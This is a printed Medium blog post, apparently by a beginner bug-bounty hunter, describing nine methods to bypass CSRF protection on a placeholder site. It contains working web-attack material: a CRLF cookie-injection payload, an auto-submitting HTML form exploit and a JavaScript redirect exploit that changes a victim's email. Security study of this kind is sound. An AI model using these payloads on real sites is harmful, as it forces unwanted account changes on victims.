4/9/24, 4:30 AM My methodology to bypass CSRF.

Hello everyone, my name is Ahmed Farag… | by 0x7irix | Apr, 2024 | Medium

Open in app

Search

My methodology to bypass CSRF

0x7irix · Follow
4 min read · 4 days ago

Listen Share More

3:29

Hello everyone, my name is Ahmed Farag, and this is my first blog on my journey to
study web application vulnerabilities .i will show my methodology to bypass csrf
with 9 different methods.

First, let’s learn about:

Alt+A
What is Cross-Site Request Forgery (CSRF)?

https://medium.com/@0x7irix/my-methodology-to-bypass-csrf-957b4e552ae7 1/10
4/9/24, 4:30 AM My methodology to bypass CSRF. Hello everyone, my name is Ahmed Farag… | by 0x7irix | Apr, 2024 | Medium

Cross-site request forgery (also known as CSRF) is a web security vulnerability that
allows an attacker to induce users to perform actions that they do not intend to
perform. It allows an attacker to partly circumvent the same origin policy, which is
designed to prevent different websites from interfering with each other.

How does CSRF work actually ?

There are some conditions for a CSRF attack to be possible :

An Action : There should be an API call or POST request that an attacker can
take advantage of. The action can be anything like email changing , password
reset , profile update , 2FA enabling etc..

Cookie based Session Handling : The application must rely on the session
cookies to identify which user made the request. There should be no other
protection in place to track user’s request or any kind of protection like asking
secret questions for an update. 3:29

No Token Parameters : The requests that perform the requests do not contain
any parameters which contains values that an attacker cannot guess or brute
force. Example: If you are going to enable 2FA then the application is likely
going to ask you to confirm your password, so in that case the attacker would
not be able to successfully use CSRF because of not knowing the password.

Bypass CSRF Protection

Bypass Method-1
first step scan if the server Only checks the token

check if token is constant for any request i sent it. if token is constant now i can say i
have csrf vulnerability

POST /my-account/change-email HTTP/2

Host: test.com
Cookie: session=Bahclb54I2oDaJtDBtqTX9ZvXvl432NQ
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/11
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
Origin: https://test.com
Referer: https://test/my-account?id=irix
https://medium.com/@0x7irix/my-methodology-to-bypass-csrf-957b4e552ae7 2/10
4/9/24, 4:30 AM My methodology to bypass CSRF. Hello everyone, my name is Ahmed Farag… | by 0x7irix | Apr, 2024 | Medium

Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
email=test%40test.com&csrf=Yl1zlDXaJsflSqKqBVZtN9bK3MMjyXhN

Bypass Method-2
delete the value of token and send the request if the value of request is Missing CSRF
try to delete the parameter and try to send request again if the respound is 200 or
302 now you have csrf vulnerability

try that -->> csrf= or just email in the request

3:29
the response is
HTTP/2 302 Found
HTTP/2 200 OK

Bypass Method-3
try to change the token and send the request may be the server is not check the
token if any value is found

Bypass Method-4
if the server check to value like csrf and csrfKey if two value are different and the
csrf only stored in cookie we can inject url code to add csrfKey in the victim’s
browser like this

/?search=test%0d%0aSet-Cookie:%20csrfKey=YOUR-KEY%3b%20SameSite=None

the exploit code for this case:

https://medium.com/@0x7irix/my-methodology-to-bypass-csrf-957b4e552ae7 3/10
4/9/24, 4:30 AM My methodology to bypass CSRF. Hello everyone, my name is Ahmed Farag… | by 0x7irix | Apr, 2024 | Medium

<html>
<body>
<form action="https://test.com/my-account/change-email" method="POST">
<input type="hidden" name="email" value="irix&#64;irxi&#46;com" />
<input type="hidden" name="csrf" value="irix" />
<input type="submit" value="Submit request" />
</form>
<img src="https://test.com/?search=test%0d%0aSet-Cookie:%20csrfKey=YOUR-KEY
</body>
</html>

Bypass Method-5
try to change the request method

Bypass Method-6
3:29
if you try change the request method and the server is refused that try to overwrite
for this method
change request method and add this in the request on burp

GET /my-account/change-email?email=irix@irixt.com&_method=POST HTTP/1.1

exploit code:

<script>
document.location = "https://test.com/my-account/change-email?email=test@te
</script>

Bypass Method-7
create a new account and try to send request take the token and drop the request
then take the token and add it on another request for different account .

Bypass Method-8
Many Web applications use a Static and Dynamic part CSRF token i.e take the below
example

https://medium.com/@0x7irix/my-methodology-to-bypass-csrf-957b4e552ae7 4/10
4/9/24, 4:30 AM My methodology to bypass CSRF. Hello everyone, my name is Ahmed Farag… | by 0x7irix | Apr, 2024 | Medium

CSRF Token : ZkfcxrWQ9CeoefwlwXuIXofKB6Vnk6t7jA9n2zxG

In this CSRF token , the first 20 characters are static i.e they are same for all the
users registered on the Web application and the next 20 characters are dynamic
which means the last 20 characters are different for all the users. So what you can do
is keep the static characters of the CSRF token same and use random text for the
dynamic 20 characters. If the server is accepting the CSRF token then you have
successfully bypass CSRF Protection.

Bypass Method-9
Check for Token randomness and use BURP to automate this randomness test
process and see if the token is weak or not and try to crack it. Remember to also see
if the CSRF token is just a normal hash token like MD5 and if it’s actually a common
algorithm then you can try creating new token using that hash algorithm and
replace the token. Try changing User-Agent to Mobile User agent and see if the
3:29
request is accepted.

LinkedIn profile : @irix

Facebook profile : @irix

Csrf Token Csrf Bug Bounty Csrf Attack Csrf Bypass

Follow

Written by 0x7irix
15 Followers

https://medium.com/@0x7irix/my-methodology-to-bypass-csrf-957b4e552ae7 5/10
4/9/24, 4:30 AM My methodology to bypass CSRF. Hello everyone, my name is Ahmed Farag… | by 0x7irix | Apr, 2024 | Medium

Recommended from Medium

3:29

dynnyd20

One-click Account Take Over

Hello, my friends!

5 min read · 6 days ago

353 8

https://medium.com/@0x7irix/my-methodology-to-bypass-csrf-957b4e552ae7 6/10
4/9/24, 4:30 AM My methodology to bypass CSRF. Hello everyone, my name is Ahmed Farag… | by 0x7irix | Apr, 2024 | Medium

Abdelrhman Allam (sl4x0)

FB OAuth Misconfiguration Leads to Takeover any Account 3:29

3 min read · 4 days ago

153 2

Lists

Medium's Huge List of Publications Accepting Submissions

285 stories · 2368 saves

https://medium.com/@0x7irix/my-methodology-to-bypass-csrf-957b4e552ae7 7/10
4/9/24, 4:30 AM My methodology to bypass CSRF. Hello everyone, my name is Ahmed Farag… | by 0x7irix | Apr, 2024 | Medium

NIKHIL RANE

How i found Multiple IDOR 3:29

Hi People, My name is Nikhil Rane. A Bug Bounty Hunter from India. I am doing Bugbounty
hunting from past couple of years. I never tried…

4 min read · Mar 30, 2024

380

Anas H Hmaidy

https://medium.com/@0x7irix/my-methodology-to-bypass-csrf-957b4e552ae7 8/10
4/9/24, 4:30 AM My methodology to bypass CSRF. Hello everyone, my name is Ahmed Farag… | by 0x7irix | Apr, 2024 | Medium

Don’t Trust the Cache: Exposing Web Cache Poisoning and Deception
vulnerabilities
Good Day!

9 min read · 3 days ago

57

3:29

Gilson Oliveira

Smart Fuzzing — Finding bugs like no one else. By Gilson Oliveira

Hi, everyone!

3 min read · 5 days ago

114

https://medium.com/@0x7irix/my-methodology-to-bypass-csrf-957b4e552ae7 9/10
4/9/24, 4:30 AM My methodology to bypass CSRF. Hello everyone, my name is Ahmed Farag… | by 0x7irix | Apr, 2024 | Medium

rAmpancist

Art of onscrollend | Demonstrating XSS through scroll events write-up3:29

Walk-through of creating payload with scroll events and <slot>

8 min read · 4 days ago

54

See more recommendations

https://medium.com/@0x7irix/my-methodology-to-bypass-csrf-957b4e552ae7 10/10